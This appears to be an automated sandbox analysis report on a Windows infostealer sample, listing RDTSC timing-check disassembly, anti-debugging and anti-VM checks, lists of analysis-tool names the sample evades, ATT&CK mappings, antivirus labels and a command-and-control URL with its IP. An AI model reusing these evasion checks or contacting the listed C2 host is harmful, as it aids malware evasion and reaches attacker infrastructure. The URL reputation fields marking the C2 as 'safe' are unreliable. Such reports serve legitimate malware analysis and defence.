Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240918 second address: 724091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724091E second address: 7240931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F70F070E5CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240931 second address: 724093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724093F second address: 7240943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240943 second address: 7240949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240949 second address: 7240964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240964 second address: 72409A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F70F0BCDB13h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F70F0BCDB16h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F70F0BCDB0Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72409A4 second address: 72409AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72409AA second address: 7240A1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F70F0BCDB0Ah 0x0000000b or ch, FFFFFF98h 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F70F0BCDB0Bh 0x00000021 xor cl, 0000005Eh 0x00000024 jmp 00007F70F0BCDB19h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F70F0BCDB10h 0x00000030 and ch, 00000058h 0x00000033 jmp 00007F70F0BCDB0Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240A1A second address: 7240A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240A20 second address: 7240A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250AB8 second address: 7250AD0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F70F070E5CBh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250AD0 second address: 7250AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250AD6 second address: 7250B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 0DBD9375h 0x00000008 call 00007F70F070E5D2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], ebp 0x00000014 pushad 0x00000015 call 00007F70F070E5D7h 0x0000001a pushfd 0x0000001b jmp 00007F70F070E5D8h 0x00000020 sbb eax, 1AC95A58h 0x00000026 jmp 00007F70F070E5CBh 0x0000002b popfd 0x0000002c pop eax 0x0000002d pushfd 0x0000002e jmp 00007F70F070E5D9h 0x00000033 or esi, 30C095F6h 0x00000039 jmp 00007F70F070E5D1h 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 jmp 00007F70F070E5CEh 0x00000047 push dword ptr [ebp+04h] 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F70F070E5D7h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250B9A second address: 7250BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250BA0 second address: 7250BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7250BA4 second address: 7250BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0A32 second address: 72C0A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0A36 second address: 72C0A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0A3C second address: 72C0A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F70F070E5CEh 0x00000012 jmp 00007F70F070E5D5h 0x00000017 popfd 0x00000018 call 00007F70F070E5D0h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0A88 second address: 72C0AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dl, byte ptr [ebp+14h] 0x00000009 jmp 00007F70F0BCDB17h 0x0000000e mov eax, dword ptr [ebp+10h] 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0AAF second address: 72C0B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F70F070E5D0h 0x0000000a add ax, 9508h 0x0000000f jmp 00007F70F070E5CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F70F070E5D8h 0x0000001c adc eax, 6AAE3768h 0x00000022 jmp 00007F70F070E5CBh 0x00000027 popfd 0x00000028 popad 0x00000029 and dl, 00000007h 0x0000002c pushad 0x0000002d mov edi, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F70F070E5CEh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B18 second address: 72C0B28 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B28 second address: 72C0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B2C second address: 72C0B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B32 second address: 72C0B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B42 second address: 72C0B8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F71607F31A5h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F70F0BCDB0Bh 0x0000001a xor si, 3D6Eh 0x0000001f jmp 00007F70F0BCDB19h 0x00000024 popfd 0x00000025 mov di, cx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0B8B second address: 72C0BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BA7 second address: 72C0BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d jmp 00007F70F0BCDB0Ch 0x00000012 inc ecx 0x00000013 pushad 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 shr eax, 1 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BCE second address: 72C0BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BD2 second address: 72C0BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BD6 second address: 72C0BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BDC second address: 72C0BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C0BF6 second address: 72C0A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7160333B99h 0x0000000d jne 00007F70F070E5BDh 0x0000000f inc ecx 0x00000010 shr eax, 1 0x00000012 jne 00007F70F070E5BDh 0x00000014 imul ecx, ecx, 03h 0x00000017 movzx eax, dl 0x0000001a cdq 0x0000001b sub ecx, 03h 0x0000001e call 00007F70F071EABDh 0x00000023 cmp cl, 00000040h 0x00000026 jnc 00007F70F070E5D7h 0x00000028 cmp cl, 00000020h 0x0000002b jnc 00007F70F070E5C8h 0x0000002d shld edx, eax, cl 0x00000030 shl eax, cl 0x00000032 ret 0x00000033 or edx, dword ptr [ebp+0Ch] 0x00000036 or eax, dword ptr [ebp+08h] 0x00000039 or edx, 80000000h 0x0000003f pop ebp 0x00000040 retn 0010h 0x00000043 push ebp 0x00000044 push 00000001h 0x00000046 push edx 0x00000047 push eax 0x00000048 call edi 0x0000004a mov edi, edi 0x0000004c jmp 00007F70F070E5D2h 0x00000051 xchg eax, ebp 0x00000052 jmp 00007F70F070E5D0h 0x00000057 push eax 0x00000058 jmp 00007F70F070E5CBh 0x0000005d xchg eax, ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F70F070E5D0h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A0E34 second address: 72A0E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A0E46 second address: 72A0E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A0E59 second address: 72A0E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BDFAD8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D8DA07 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BDF9B7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E17F16 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719980 rdtsc 0_2_00719980
Source: C:\Users\user\Desktop\file.exe TID: 6804Thread sleep count: 36 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6804Thread sleep time: -72036s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6968Thread sleep count: 65 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6968Thread sleep time: -130065s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5492Thread sleep count: 65 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5492Thread sleep time: -130065s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1308Thread sleep count: 55 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1308Thread sleep time: -110055s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2172Thread sleep count: 56 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2172Thread sleep time: -112056s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5496Thread sleep count: 53 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5496Thread sleep time: -106053s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6716Thread sleep count: 59 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6716Thread sleep time: -118059s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5632Thread sleep count: 60 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5632Thread sleep time: -120060s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0053255D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_005329FF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0053255D
Source: file.exe, file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: file.exeBinary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2629736059.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2630078979.000000000170C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2630026091.00000000016FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2606683274.00000000016CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073486658.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2629692014.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2632082566.000000000170D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07230A43 Start: 07230A27 End: 07230A220_2_07230A43
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07290486 Start: 07290582 End: 072905880_2_07290486
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00719980 rdtsc 0_2_00719980
Source: file.exe, file.exe, 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.5:49705 -> 34.118.84.150:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe32%ReversingLabsWin32.Infostealer.Tinba
file.exe100%AviraTR/Crypt.TPM.Gen
file.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI17327684770%Avira URL Cloudsafe
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477http://home.twentykx20pt.top/AMeacCwtwXCq0%Avira URL Cloudsafe
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI17327684775a10%Avira URL Cloudsafe
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477fd40%Avira URL Cloudsafe
http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477?argument=0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentykx20pt.top
34.118.84.150
truetrue
    		unknown
    httpbin.org
    		18.213.123.165
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477true
      • Avira URL Cloud: safe
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlfile.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpfalse
          		high
          http://html4/loose.dtdfile.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            https://curl.se/docs/alt-svc.html#file.exefalse
              		high
              http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477?argument=file.exe, 00000000.00000003.2630054574.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2629897019.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2631723255.00000000016A5000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://httpbin.org/ipbeforefile.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/http-cookies.htmlfile.exe, file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477fd4file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://curl.se/docs/hsts.html#file.exefalse
                    		high
                    https://curl.se/docs/http-cookies.html#file.exefalse
                      		high
                      https://curl.se/docs/alt-svc.htmlfile.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://.cssfile.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI17327684775a1file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://.jpgfile.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477http://home.twentykx20pt.top/AMeacCwtwXCqfile.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            18.213.123.165
                            		httpbin.orgUnited States
